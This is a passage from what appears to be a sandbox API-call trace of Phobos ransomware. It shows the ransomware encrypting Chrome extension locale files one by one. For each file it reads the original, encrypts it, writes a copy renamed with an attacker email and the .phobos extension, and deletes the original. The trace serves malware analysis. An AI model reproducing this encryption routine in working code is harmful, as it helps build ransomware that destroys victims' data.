data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.811] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.811] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.811] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.812] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.812] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.812] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.813] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.813] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.814] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.814] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.814] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.814] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.814] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.814] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.814] CloseHandle (hObject=0x130) returned 1 [0151.814] CloseHandle (hObject=0x138) returned 1 [0151.814] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ko\\messages.json")) returned 1 [0151.815] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.815] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.815] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.815] CloseHandle (hObject=0x138) returned 1 [0151.816] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json")) returned 0x2020 [0151.816] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.816] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.816] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.816] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.817] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.817] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.817] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.818] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.818] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.819] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.819] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.819] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.819] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.819] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.819] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.819] CloseHandle (hObject=0x138) returned 1 [0151.819] CloseHandle (hObject=0x130) returned 1 [0151.819] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lt\\messages.json")) returned 1 [0151.820] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.820] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.820] CloseHandle (hObject=0x130) returned 1 [0151.820] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json")) returned 0x2020 [0151.821] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.821] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.821] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.821] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.821] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.821] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.821] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.822] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.822] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.823] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.823] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.823] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.823] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.823] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.823] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.823] CloseHandle (hObject=0x130) returned 1 [0151.823] CloseHandle (hObject=0x138) returned 1 [0151.823] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\lv\\messages.json")) returned 1 [0151.824] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.825] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=179) returned 1 [0151.825] CloseHandle (hObject=0x138) returned 1 [0151.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json")) returned 0x2020 [0151.825] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.825] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.825] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.825] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.825] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.825] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.826] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0xb3, lpOverlapped=0x0) returned 1 [0151.826] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0, dwBufLen=0xc0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0xc0) returned 1 [0151.826] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xc0, lpOverlapped=0x0) returned 1 [0151.827] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32da8) returned 1 [0151.827] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.827] CryptEncrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.827] CryptDestroyKey (hKey=0xa32da8) returned 1 [0151.827] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.827] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.828] CloseHandle (hObject=0x138) returned 1 [0151.828] CloseHandle (hObject=0x130) returned 1 [0151.828] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\nl\\messages.json")) returned 1 [0151.829] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.829] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=159) returned 1 [0151.829] CloseHandle (hObject=0x130) returned 1 [0151.829] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json")) returned 0x2020 [0151.829] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.829] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.830] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\no\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 